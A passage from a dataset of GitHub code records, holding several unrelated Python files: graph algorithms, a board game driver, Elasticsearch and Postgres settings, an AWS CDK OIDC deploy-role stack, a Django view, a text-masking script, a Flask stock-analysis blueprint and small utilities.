SStack():\n def __init__(self):\n self._elems = []\n\n def is_empty(self):\n return self._elems == []\n\n def top(self):\n if self._elems == []:\n raise StackUnderFlow(\"in SStack.top()\")\n return self._elems[-1]\n\n def push(self, elem):\n self._elems.append(elem)\n\n def pop(self):\n if self._elems == []:\n raise StackUnderFlow(\"in SStack pop()\")\n return self._elems.pop()\n\n# 深度优先非递归算法\ndef DFS_graph(graph, v0):\n vnum = graph.vertex_num()\n visited = [0]*vnum\n visited[v0] = 1\n DFS_seq = [v0]\n# visited记录访问过的点, DFS_Seq记录访问过的序列\n st = SStack()\n# 利用一个栈作为辅助数据结构\n st.push((0, graph.out_edges(v0))) # 入栈\n while not st.is_empty():\n i, edges = st.pop()\n if i < len(edges):\n v, e = edges[i]\n st.push((i+1, edges))\n if not visited[v]:\n DFS_seq.append(v)\n visited[v] = 1\n st.push((0, graph.out_edges(v)))\n return DFS_seq\n# 入栈元素为(i, edges),其中edges是某个顶点的边表,i是边表下标记\n\n\n\n# 递归生成树算法\ndef DFS_span_forest(graph):\n vnum = graph.vertex_num()\n span_forest = [None] * vnum\n\n def dfs(graph, v): # 递归遍历函数, 在递归中记录经由边\n nonlocal span_forest # span_forest is nonloacal\n for u, w in graph.out_edges(v):\n if span_forest[u] is None:\n span_forest[u] = (v, w)\n dfs(graph, u)\n\n for v in range(vnum):\n if span_forest[v] is None:\n span_forest[v] = (v, 0)\n dfs(graph, v)\n\n return span_forest\n\n# 最小生成树算法\n# Kruskal算法\ndef Kruskal(graph):\n vnum = graph.vertex_num()\n reps = [i for i in range(vnum)]\n mst, edges = [], []\n for vi in range(vnum):\n for v, w in graph.out_edges(vi):\n edges.append((w, vi, v))\n # w 表示权值, vi,vj表示端点\n edges.sort()\n # use sort to find the min edge\n for w, vi, vj in edges:\n if reps[vi] != reps[vj]:\n mst.append((vi, vj, w))\n if len(mst) == vnum -1:\n break\n rep, orep = reps[vi], reps[vj]\n for i in range(vnum):\n if reps[i] == orep:\n reps[i] = rep\n return mst\n\n# Prim算法\n# 基于最小生成树性质\n# 优先队列\nclass PrioQueueError(ValueError):\n pass\n\nclass PrioQue:\n def __init__(self, elist=[]):\n self._elems = list(elist)\n self._elems.sort(reverse = True)\n\n def enqueue(self, e):\n i = len(self._elems) - 1\n while i >= 0:\n if self._elems[i] <= e:\n i -= 1\n else:\n break\n self._elems.insert(i+1, e)\n\n def is_empty(self):\n return not self._elems\n\n def peek(self):\n if self.is_empty():\n raise PrioQueueError(\"in top\")\n return self._elems[-1]\n\n def dequeue(self):\n if self.is_empty():\n raise PrioQueueError(\"in pop\")\n return self._elems.pop()\n\ndef Prim(graph):\n vnum = graph.vertex_num()\n mst = [None] * vnum\n cands = PrioQue([(0, 0, 0)])\n count = 0\n while count < vnum and not cands.is_empty():\n w, u, v = cands.dequeue()\n if mst[v]:\n continue\n mst[v] = ((u, v), w)\n count += 1\n for vi, w in graph.out_edges(v):\n if not mst[vi]:\n cands.enqueue((w, v, vi))\n return mst\n\n# Dijikstra算法,求解最小路径\ndef dijikstra_shortest_paths(graph, v0):\n vnum = graph.vertex_num()\n assert 0 <= v0 < vnum\n paths = [None] * vnum\n count = 0\n cands = PrioQue([(0, v0, v0)])\n# 初始队列\n while count < vnum and not cands.is_empty():\n # 取路径最短顶点\n plen, u, vmin = cands.dequeue()\n if paths[vmin]:\n # 如果其最短路径已知则继续\n continue\n paths[vmin] = (u, plen)\n # 记录新确定的最短路径\n for v, w in graph.out_edges(vmin):\n if not paths[v]:\n cands.enqueue((plen + w, vmin, v))\n count += 1\n return paths\n\n\n\n# Floyd算法\ndef all_shortest_paths(graph):\n vnum = graph.vertex_num()\n a = [[graph.get_edge(i,j) for j in range(vnum)]\n for i in range(vnum)] # create a copy\n nvertex = [[-1 if a[i][j] == inf else j\n for j in range(vnum)]\n for i in range(vnum)]\n for k in range(vnum):\n for i in range(vnum):\n for j in range(vnum):\n if a[i][j] > a[i][k] + a[k][j]:\n a[i][j] = a[i][k] + a[k][j]\n nvertex[i][j] = nvertex[i][k]\n return (a, nvertex)\n# a记录已知最短路径长度, nvetex记录已知最短路径上的下一顶点\n\n\n# Bellman-Ford算法:有负权边的单源最短路径算法,解决Dijkstra算法缺陷\n\n\n\n\n\n\n# AOV网拓扑排序\ndef topsort(graph):\n vnum = graph.vertex_num()\n indegree, toposeq = [0]*vnum, []\n zerov = -1\n for vi in range(vnum):\n for v, w, in graph.out_edges(vi):\n indegree[v] += 1\n for vi in range(vnum):\n if indegree[vi] == 0:\n indegree[vi] = zerov\n zerov = vi\n for n in range(vnum):\n if zerov == -1:\n return False\n vi = zerov\n zerov = indegree[zerov]\n toposeq.append(vi)\n for v, w in graph.out_edges(vi):\n indegree[v] -= 1\n if indegree[v] == 0:\n indegree[v] = zerov\n zerov = v\n return toposeq\n\n\n\n\n\n# AOE网关键算法\n# ee[j]:活动vj最早可以开始时间\n# le[j]:最晚\n\ndef critical_paths(graph):\n def events_earliest_time(vnum, graph, toposeq):\n ee = [0] * vnum\n for i in toposeq:\n for j, w in graph.out_edges(i):\n if ee[i] + w > ee[j]:\n ee[j] = ee[i]+w\n return ee\n\n def event_latest_time(vnum, graph, toposeq, eelast):\n le = [eelast] * vnum\n for k in range(vnum-2, -1, -1):\n i = toposeq[k]\n for j, w in graph.out_edges(i):\n if le[j] - w < le[i]:\n le[i] = le[j] - w\n return le\n\n def crt_paths(vnum, graph, ee, le):\n crt_Actions = []\n for i in range(vnum):\n for j, w in graph.out_edges(i):\n if ee[i] == le[j] - w:\n crt_Actions.append((i, j, ee[i]))\n return crt_Actions\n\n toposeq = topsort(graph)\n if not toposeq:\n return False\n vnum = graph.vertex_num()\n ee = events_earliest_time(vnum, graph, toposeq)\n le = event_latest_time(vnum, graph, toposeq, ee[vnum-1])\n return crt_paths(vnum, graph, ee, le)\n\n\n\n\n\n\nif __name__ == \"__main__\":\n print(\"start to build a graph\")\n mat = [[0,0,1], [1, 0, 1], [0, 1, 0]]\n g = Graph(mat)\n print(g.vertex_num())\n g.add_edge(1, 2, 3)\n print(str(g))\n g_al = GraphAL(mat)\n print(str(g_al))\n\n span_forest = DFS_span_forest(g_al)\n print(span_forest)\n\n print(\"MST\",Kruskal(g_al))\n print(Prim(g_al))\n\n print(\"path:\", dijikstra_shortest_paths(g_al, 0))\n\n print(all_shortest_paths(g))\n print('--------------------')\n mat2 = [[0, 30, inf, 10, 50],[inf, 0, 60, inf, 80], [inf, inf, 0, inf, inf],\n [inf, inf, inf, 0, 30], [50, inf, 40, inf, 0]]\n\n g = Graph(mat2)\n print(all_shortest_paths(g))\n print('--------------------')\n g_al = GraphAL(mat2)\n print(all_shortest_paths(g_al))\n","repo_name":"NeilWangziyu/crawler","sub_path":"python_struction_6_graph.py","file_name":"python_struction_6_graph.py","file_ext":"py","file_size_in_byte":11389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38394848606","text":"import sys\r\nsys.path.append(sys.path[0]+'\\models')\r\n\r\nfrom board import board\r\nfrom dice import dice\r\nfrom player import player\r\nfrom ladder import ladder\r\nfrom piece import piece\r\nfrom snake import snake\r\n\r\nb=board()\r\nd=dice()\r\ns=int(input()) #number of snakes\r\nsnake=[]\r\nfor i in range(s):\r\n snake.append([int(x) for x in input().split(' ')])\r\n\r\nl=int(input()) #numbr of ladders\r\nladder=[]\r\nfor i in range(l):\r\n ladder.append([int(x) for x in input().split(' ')])\r\n\r\nfor m in snake:\r\n b.placeSnake(m[0],m[1])\r\n\r\nfor l in ladder:\r\n b.placeLadder(l[0],l[1])\r\n\r\np=int(input()) #number of players\r\n\r\nplayers=[]\r\nfor i in range(p):\r\n p1=player()\r\n p1.createPlayer(input())\r\n p1.allotApiece()\r\n players.append(p1)\r\n\r\nflag=0\r\nwhile not flag:\r\n i=0\r\n for p in players:\r\n v=p.rollDice(d)\r\n flag=b.movePiece(p.owns,v)\r\n if flag==1:\r\n break\r\n","repo_name":"salonicodes/Snakes-And-Ladders","sub_path":"SnakesAndLadders.py","file_name":"SnakesAndLadders.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"2141718608","text":"import os\n\nfrom dotenv import load_dotenv\nfrom pydantic import BaseSettings, Field\n\n\nclass PostgresBaseSettingsSettings(BaseSettings):\n dbname: str\n user: str = Field(env=\"dbuser\")\n password: str\n host: str\n port: int\n\n class Config:\n env_file = \".env\"\n\n\nclass PostgresDevSettings(PostgresBaseSettingsSettings):\n class Config:\n env_file = \"dev.env\"\n\n\nclass PostgresProdSettings(PostgresBaseSettingsSettings):\n class Config:\n env_file = \".env\"\n\n\nclass RedisBaseSettings(BaseSettings):\n host: str = Field(env=\"redis_host\")\n port: int = Field(env=\"redis_port\")\n\n class Config:\n env_file = \".env\"\n\n\nclass RedisDevSettings(RedisBaseSettings):\n class Config:\n env_file = \"dev.env\"\n\n\nclass RedisProdSettings(RedisBaseSettings):\n class Config:\n env_file = \".env\"\n\n\nclass ESBaseSettings(BaseSettings):\n host: str = Field(env=\"es_host\")\n\n class Config:\n env_file = \".env\"\n\n\nclass ESDevSettings(ESBaseSettings):\n class Config:\n env_file = \"dev.env\"\n\n\nclass ESProdSettings(ESBaseSettings):\n class Config:\n env_file = \".env\"\n\n\nclass Settings(BaseSettings):\n \"\"\"Settings for establishing all connections.\"\"\"\n\n pg_config = dict(dev=PostgresDevSettings, prod=PostgresProdSettings)\n pg_params: PostgresBaseSettingsSettings = pg_config[\n os.environ.get(\"ENV\", \"dev\").lower()\n ]()\n\n redis_config = dict(dev=RedisDevSettings, prod=RedisProdSettings)\n redis_params: RedisBaseSettings = redis_config[\n os.environ.get(\"ENV\", \"dev\").lower()\n ]()\n\n es_config = dict(dev=ESDevSettings, prod=ESProdSettings)\n es_params: ESBaseSettings = es_config[os.environ.get(\"ENV\", \"dev\").lower()]()\n\n class Config:\n env_file = \".env\"\n\n\ndef get_connection_params():\n \"\"\"Returns all connection parameters as dict.\"\"\"\n load_dotenv()\n dsl = {\n \"dbname\": os.environ.get(\"dbname\"),\n \"user\": os.environ.get(\"user\"),\n \"password\": os.environ.get(\"password\"),\n \"host\": os.environ.get(\"host\"),\n \"port\": int(os.environ.get(\"port\")),\n }\n\n es_params = os.environ.get(\"es_host\")\n\n redis_params = {\n \"host\": os.environ.get(\"redis_host\"),\n \"port\": os.environ.get(\"redis_port\"),\n }\n\n return {\"dsl\": dsl, \"es_params\": es_params, \"redis_params\": redis_params}\n\n\nsettings = Settings()\n\n\nbase_es_settings = {\n 'refresh_interval': '1s',\n 'analysis':\n {\n 'filter': {\n 'english_stop': {'type': 'stop', 'stopwords': '_english_'},\n 'english_stemmer': {'type': 'stemmer', 'language': 'english'},\n 'english_possessive_stemmer': {'type': 'stemmer', 'language': 'possessive_english'},\n 'russian_stop': {'type': 'stop', 'stopwords': '_russian_'},\n 'russian_stemmer': {'type': 'stemmer', 'language': 'russian'}\n },\n 'analyzer': {\n 'ru_en': {\n 'tokenizer': 'standard',\n 'filter': ['lowercase', 'english_stop', 'english_stemmer', 'english_possessive_stemmer',\n 'russian_stop', 'russian_stemmer']\n }\n }\n },\n}\n\nes_movies_mapping = {\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"imdb_rating\": {\"type\": \"float\"},\n \"title\": {\n \"type\": \"text\",\n \"analyzer\": \"ru_en\",\n \"fields\": {\"raw\": {\"type\": \"keyword\"}},\n },\n \"description\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"director\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"actors_names\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"writers_names\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n \"genre\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"directors\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"actors\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"writers\": {\n \"type\": \"nested\",\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"name\": {\"type\": \"text\", \"analyzer\": \"ru_en\"},\n },\n },\n \"modified\": {\n \"type\": \"date\"\n }\n },\n}\n\nes_genres_mapping = {\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"genre_name\": {\n \"type\": \"text\",\n \"analyzer\": \"ru_en\",\n \"fields\": {\"raw\": {\"type\": \"keyword\"}},\n },\n \"description\": {\"type\": \"keyword\"},\n \"modified\": {\n \"type\": \"date\"\n }\n },\n}\n\nes_persons_mapping = {\n \"dynamic\": \"strict\",\n \"properties\": {\n \"id\": {\"type\": \"keyword\"},\n \"full_name\": {\n \"type\": \"text\",\n \"analyzer\": \"ru_en\",\n \"fields\": {\"raw\": {\"type\": \"keyword\"}},\n },\n \"modified\": {\n \"type\": \"date\"\n }\n },\n}\n\npg_es_index_name_with_mappings_dict = {\n \"movies\": es_movies_mapping,\n \"genres\": es_genres_mapping,\n \"persons\": es_persons_mapping\n}\n\n\nindex_to_tables_dict = {\n \"movies\": {\n \"table_name\": \"film_work\",\n \"select_query\": \"\"\"SELECT\n fw.id,\n fw.title,\n fw.description,\n fw.rating,\n fw.type,\n fw.created,\n fw.modified,\n COALESCE (\n json_agg(\n DISTINCT jsonb_build_object(\n 'person_role', pfw.role,\n 'person_id', p.id,\n 'person_name', p.full_name\n )\n ) FILTER (WHERE p.id is not null),\n '[]'\n ) as persons,\n COALESCE (\n json_agg(\n DISTINCT jsonb_build_object(\n 'genre_id', g.id,\n 'genre_name', g.name\n )\n ) FILTER (WHERE g.id is not null),\n '[]'\n ) as genres\n FROM content.film_work fw\n LEFT JOIN content.person_film_work pfw ON pfw.film_work_id = fw.id\n LEFT JOIN content.person p ON p.id = pfw.person_id\n LEFT JOIN content.genre_film_work gfw ON gfw.film_work_id = fw.id\n LEFT JOIN content.genre g ON g.id = gfw.genre_id\n WHERE fw.modified > %(state)s::timestamp OR p.modified > %(state)s::timestamp OR g.modified > %(state)s::timestamp\n GROUP BY fw.id\n ORDER BY fw.modified DESC;\n \"\"\",\n },\n \"persons\": {\n \"table_name\": \"person\",\n \"select_query\": \"\"\"SELECT\n p.id,\n p.full_name,\n p.modified\n FROM content.person p\n WHERE p.modified > %(state)s::timestamp\n GROUP BY p.id\n ORDER BY p.modified DESC;\n \"\"\",\n },\n \"genres\": {\n \"table_name\": \"genre\",\n \"select_query\": \"\"\"SELECT\n g.id,\n g.name,\n g.description,\n g.modified\n FROM content.genre g\n WHERE g.modified > %(state)s::timestamp \n GROUP BY g.id\n ORDER BY g.modified DESC;\n \"\"\",\n },\n}\n","repo_name":"Sladick/Async_API_sprint_1_29","sub_path":"etl/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31545263849","text":"\"\"\"\nCDK application entry point file.\n\"\"\"\nimport constructs\nfrom aws_cdk import App, CfnOutput, CfnParameter, Stack, aws_iam\n\n\nclass OidcProviderStack(Stack):\n def __init__(self, scope: constructs.Construct, construct_id: str) -> None:\n super().__init__(scope, construct_id)\n\n env_name = CfnParameter(self, \"EnvName\", type=\"String\", description=\"The environment to deploy the OidcProviderStack\")\n\n github_repo = CfnParameter(\n self,\n \"GithubRepo\",\n type=\"String\",\n description=\"Specify the parameters that limit which GitHub repo has access to AWS\",\n )\n\n aws_iam.OpenIdConnectProvider(\n self,\n \"GithubAwsOidcProvider\",\n url=\"https://token.actions.githubusercontent.com\",\n client_ids=[\"sts.amazonaws.com\"],\n )\n\n account_id = aws_iam.AccountRootPrincipal().account_id\n\n oidc_deploy_role = aws_iam.Role(\n self,\n \"OidcDeployRole\",\n role_name=f\"{env_name.value_as_string}Oidc\",\n assumed_by=aws_iam.WebIdentityPrincipal(\n f\"arn:aws:iam::{account_id}:oidc-provider/token.actions.githubusercontent.com\",\n {\n \"StringLike\": {\n \"token.actions.githubusercontent.com:aud\": [\"sts.amazonaws.com\"],\n \"token.actions.githubusercontent.com:sub\": [f\"repo:{github_repo.value_as_string}\"],\n }\n },\n ),\n )\n\n oidc_deploy_role.add_managed_policy(aws_iam.ManagedPolicy.from_aws_managed_policy_name(\"AdministratorAccess\"))\n\n # Set Cfn to output deploy_role arn post CDK deployment.\n # Assign or update this value in AWS_ASSUME_ROLE in GitHub secrets\n CfnOutput(self, \"ServiceAccountIamRole\", value=oidc_deploy_role.role_arn)\n\n\ndef main() -> None:\n app = App()\n\n OidcProviderStack(app, \"OidcProviderStack\")\n\n app.synth()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linz/oidc-provider","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"24446851500","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def longestConsecutive(self, root: Optional[TreeNode]) -> int:\n def dfs(node, prev_val, cur_max):\n if not node:\n return cur_max\n new_max = cur_max + 1 if node.val == prev_val + 1 else 1\n return max(\n cur_max,\n dfs(node.left, node.val, new_max),\n dfs(node.right, node.val, new_max),\n )\n\n return dfs(root, float(\"-inf\"), 0)\n","repo_name":"lingduoduo/Leetcode","sub_path":"Leetcode/0298-Binary-Tree-Longest-Consecutive-Sequence.py","file_name":"0298-Binary-Tree-Longest-Consecutive-Sequence.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23678458471","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.core import serializers\nimport json\n\n\n@login_required\ndef ProfileData(request): # send all profile data\n user = request.user\n profile = user.profile\n json_data = serializers.serialize('json', [profile])\n json_data = json.loads(json_data)[0]\n del json_data['model']\n json_data['username'] = user.username\n json_data['email'] = user.email\n json_data['name'] = user.first_name\n json_data = json.dumps(json_data)\n return HttpResponse(json_data, content_type='json_comment_filtered')\n","repo_name":"anshika-V/eduHub","sub_path":"user/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30446859010","text":"from os import listdir, path, mkdir\r\nfrom os.path import isfile, join\r\nimport importlib\r\nfrom nerm.configuration import Configuration\r\nfrom brat_parser import get_entities_relations_attributes_groups\r\n\r\ndef get_data_sequences(mask_input_file_location, filename):\r\n ann_data = get_entities_relations_attributes_groups( mask_input_file_location + filename + \".ann\")\r\n sequences = []\r\n for key,values in ann_data[0].items():\r\n data =(values.text,values.type, values.span[0][0],values.span[0][1])\r\n sequences.append(data)\r\n return sequences\r\n\r\n\r\ndef masking_process(type,result,new_text):\r\n for i in range(0, len(result)):\r\n if type[\"masking_type\"] == \"Mask\":\r\n masking_class = type['masking_class']\r\n plugin_module = importlib.import_module(\"mask.masking_plugins.\" + masking_class)\r\n class_masking = getattr(plugin_module, masking_class)\r\n masking_instance = class_masking()\r\n \r\n if result[i][1] == type[\"entity_name\"]:\r\n if type[\"masking_type\"] == \"Redact\":\r\n new_token = \"XXX\"\r\n elif type[\"masking_type\"] == \"Mask\":\r\n new_token = masking_instance.mask(result[i][0])\r\n old_token = result[i][0]\r\n new_text = new_text.replace(old_token, new_token)\r\n return new_text\r\n\r\n\r\ndef apply_masking(mask_input_file_location, filename, text, plugins):\r\n new_text = text\r\n for type in plugins:\r\n result = get_data_sequences(mask_input_file_location, filename[:-4])\r\n new_text = masking_process(type,result,new_text)\r\n return new_text\r\n\r\n\r\ndef main():\r\n print(\"\\n Welcome to NERM Group Masking \\n\")\r\n\r\n cf = Configuration()\r\n input_file_location = cf.mask_input_file_location\r\n\r\n data = [f for f in listdir(input_file_location) if f.startswith('unannotated_texts')]\r\n print(data)\r\n if (len(data)>0):\r\n input_file_location = input_file_location + data[0] + \"/brat/deploy/\"\r\n \r\n data = [f for f in listdir(input_file_location) if isfile(\r\n join(input_file_location, f))]\r\n print(data)\r\n\r\n plugins = []\r\n for entity in cf.entities_list:\r\n masking_type = entity['masking_type']\r\n entity_name = entity['entity_name']\r\n if masking_type == \"Redact\":\r\n masking_class = \"\"\r\n else:\r\n masking_class = entity['masking_class']\r\n\r\n plugins.append({\"masking_type\":masking_type, \"entity_name\":entity_name, \"masking_class\":masking_class})\r\n \r\n for file in data:\r\n if file.endswith(\".txt\"):\r\n text = open(input_file_location + file, 'r').read()\r\n new_text = apply_masking(input_file_location, file, text,plugins)\r\n\r\n # Write the output\r\n if not path.exists(cf.output_file_location):\r\n mkdir(cf.output_file_location)\r\n\r\n file_handler = open(cf.output_file_location + file, \"w\")\r\n file_handler.write(new_text)\r\n file_handler.close()\r\n\r\nif __name__==\"__main__\":\r\n main()\r\n","repo_name":"Renesa534/Healthcare_data_masking","sub_path":"mask/masking.py","file_name":"masking.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"75349110700","text":"import os\n\nfrom flask import (Blueprint, abort, current_app, flash, jsonify, make_response, redirect, render_template, request,\n url_for)\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_restful import (Api, Resource, fields, marshal, marshal_with, reqparse)\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, TextField, validators\n\nfrom common.data import AttributeDict\nfrom finance_components import FinanceComponents\nfrom services.StockAnalysis.StockCharts import StockCharts\n\nfc = FinanceComponents(cfg=None)\nstock_charts = StockCharts()\n\nauth = HTTPBasicAuth()\n\nAppName = os.path.basename(__file__).split('.')[0]\nAppBlueprint = Blueprint(AppName, __name__, template_folder='templates')\napi = Api(AppBlueprint)\n\ncontext = {}\nform_submit_variable = 'textboxInput'\n\nticker_list_from_db = fc.get_stock_ticker_list_from_db()\n\n\ndef set_up_app(choices=ticker_list_from_db):\n context['AppName'] = AppName\n context['AppNameAlias'] = 'Stock Analysis'\n context['title'] = 'Stock Analysis'\n context['choices'] = choices\n context['data'] = None\n context['menu_items'] = None\n context['form_submitted_value'] = None\n context['cfg'] = {}\n return context\n\n\nset_up_app()\n\n\nclass textBoxSubmitForm(FlaskForm):\n textboxInput = StringField('Ticker: ', [validators.DataRequired()])\n submit = SubmitField('Submit')\n\n\n@AppBlueprint.route('/', methods=['GET', 'POST'])\ndef index():\n current_app.logger.debug(\"function name: {}; http request :{}\".format('index', request.method))\n\n if request.method in ['GET']:\n set_up_app()\n form = textBoxSubmitForm(request.form)\n template_path = AppName + '/' + 'index.html'\n return render_template(template_path, form=form, context=context)\n\n if request.method in ['POST']:\n ticker = get_form_submitted_value()\n url_path = url_for(AppName + '.' + 'app_menuitem', ticker=ticker, selectedMenuID='summary', _external=True)\n return redirect(url_path, code=302)\n\n\n@AppBlueprint.route('/<ticker>', methods=['GET'])\ndef app_ticker(ticker):\n current_app.logger.debug(\"function name: {}; http request :{}\".format('app_ticker', request.method))\n\n url_path = url_for(AppName + '.' + 'app_menuitem', ticker=ticker, selectedMenuID='summary', _external=True)\n return redirect(url_path, code=302)\n\n\n@AppBlueprint.route('/<ticker>/<selectedMenuID>', methods=['GET', 'POST'])\ndef app_menuitem(ticker, selectedMenuID):\n current_app.logger.debug(\"function name: {}; http request :{}\".format('app_menuitem', request.method))\n\n if request.method in ['POST']:\n ticker = get_form_submitted_value()\n url_path = url_for(AppName + '.' + 'app_menuitem',\n ticker=ticker,\n selectedMenuID=selectedMenuID,\n _external=True)\n return redirect(url_path, code=302)\n\n context_cfg_ticker = context['cfg'].get('ticker', None)\n if context_cfg_ticker != ticker:\n assign_stock_data_and_update_menu_items(ticker)\n\n form = textBoxSubmitForm(request.form)\n template_path = AppName + '/' + selectedMenuID + '.html'\n return render_template(template_path, form=form, context=context)\n\n\ndef get_form_submitted_value():\n form_submitted_value = request.form.get(form_submit_variable)\n current_app.logger.debug(\"Form Submitted ticker :{}\".format(form_submitted_value))\n\n if form_submitted_value is not None:\n if form_submitted_value != context['form_submitted_value']:\n context['form_submitted_value'] = form_submitted_value\n\n return form_submitted_value\n\n\ndef assign_stock_data_and_update_menu_items(ticker=None, test_flag=False):\n if ticker in ticker_list_from_db:\n context['data'] = {}\n context['title'] = ticker\n context['error'] = True\n if ticker is None:\n ticker = context['form_submitted_value']\n try:\n data_dict = fc.get_data_for_UI(ticker=ticker)\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data from database for :{ticker} ... SUCCESS\".format(\n AppName, ticker))\n except:\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data from database for :{ticker} ... FAIL\".format(\n AppName, ticker))\n\n try:\n context['cfg'] = fc.get_stock_analysis_UI_cfg(data_dict)\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data assignment for :{ticker} ... SUCCESS\".format(\n AppName, ticker))\n except:\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Data assignment for :{ticker} ... FAIL\".format(\n AppName, ticker))\n\n try:\n plot_cfg = fc.get_stock_analysis_plot_cfg(data_dict)\n context['plot_data'] = stock_charts.get_plot_data(plot_cfg)\n context['error'] = False\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Plot data assignment for :{ticker} ... SUCCESS\".format(\n AppName, ticker))\n except:\n if not test_flag:\n current_app.logger.debug(f\"{AppName} UI, Plot data assignment for :{ticker} ... FAIL\".format(\n AppName, ticker))\n\n if not test_flag:\n context['menu_items'] = get_menu_items(ticker)\n else:\n if not test_flag:\n current_app.logger.error(f\"{AppName} UI, No ticker ticker in database :{ticker} ... FAIL\".format(\n AppName, ticker))\n\n\ndef get_menu_items(ticker):\n current_app.logger.debug(\"Update menu urls for ticker :{}\".format(ticker))\n menu_items = [\n {\n 'id': 'summary',\n 'href': \"{}/summary\",\n 'alias': 'Summary',\n },\n {\n 'id': 'insider',\n 'href': '{}/insider',\n 'alias': 'Insider Info',\n },\n {\n 'id': 'institution',\n 'href': '{}/institution',\n 'alias': 'Institution Info',\n },\n # {\n # 'id': 'technical',\n # 'href': '{}/technical',\n # 'alias': 'Technical Analysis',\n # },\n # {\n # 'id': 'options',\n # 'href': '{}/options',\n # 'alias': 'Option Analysis',\n # },\n # {\n # 'id': 'strategies',\n # 'href': '{}/strategies',\n # 'alias': 'Strategies',\n # },\n {\n 'id': 'updates',\n 'href': '{}/updates',\n 'alias': 'Updates',\n },\n ]\n for menu_item in menu_items:\n menu_item['href'] = url_for(AppName + '.' + 'app_menuitem',\n ticker=ticker,\n selectedMenuID=menu_item['id'],\n _external=True)\n return menu_items\n","repo_name":"vamseeachanta/stockhold","sub_path":"src/stockhold/common/StockAnalysis_lagacy.py","file_name":"StockAnalysis_lagacy.py","file_ext":"py","file_size_in_byte":6959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3285218774","text":"import os\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ncsv_folder = \"Textchunks\"\r\nnpy_folder = \"Embedded Text\"\r\n\r\n# Get the sorted list of CSV and .npy files\r\ncsv_files = sorted([f for f in os.listdir(csv_folder) if f.endswith('.csv')])\r\nnpy_files = sorted([f for f in os.listdir(npy_folder) if f.endswith('.npy')])\r\n\r\n# Initialize empty DataFrame and NumPy array for concatenation\r\nconcatenated_csv = pd.DataFrame()\r\nconcatenated_npy = None\r\n\r\nfor csv_file, npy_file in zip(csv_files, npy_files):\r\n print(npy_file)\r\n # Read the CSV file and concatenate\r\n csv_path = os.path.join(csv_folder, csv_file)\r\n csv_data = pd.read_csv(csv_path, encoding='utf-8', escapechar='\\\\')\r\n concatenated_csv = pd.concat([concatenated_csv, csv_data], ignore_index=True)\r\n\r\n npy_path = os.path.join(npy_folder, npy_file)\r\n npy_data = np.load(npy_path)\r\n if concatenated_npy is None:\r\n concatenated_npy = npy_data\r\n else:\r\n concatenated_npy = np.concatenate([concatenated_npy, npy_data], axis=0)\r\n\r\n\r\n# Save the concatenated data to the base folder\r\nconcatenated_csv.to_csv(\"textchunks-originaltext.csv\", encoding='utf-8', escapechar='\\\\', index=False)\r\nnp.save(\"textchunks.npy\", concatenated_npy)\r\nprint(\"Files saved: textchunks-originaltext.csv and textchunks.npy\")\r\n# Print the dimensions of the concatenated files\r\nprint(f\"textchunks-originaltext.csv dimensions: {concatenated_csv.shape}\")\r\nprint(f\"textchunks.npy dimensions: {concatenated_npy.shape}\")\r\n\r\n","repo_name":"kevincure/All-Day-TA","sub_path":"CreateFinalData.py","file_name":"CreateFinalData.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"92"} +{"seq_id":"12254386149","text":"def is_anagram(first_string, second_string):\n string_one = merge_sort(list(first_string.lower()))\n string_two = merge_sort(list(second_string.lower()))\n\n if first_string == '' or second_string == '' or string_one != string_two:\n return (\"\".join(string_one), \"\".join(string_two), False)\n else:\n return (\"\".join(string_one), \"\".join(string_two), 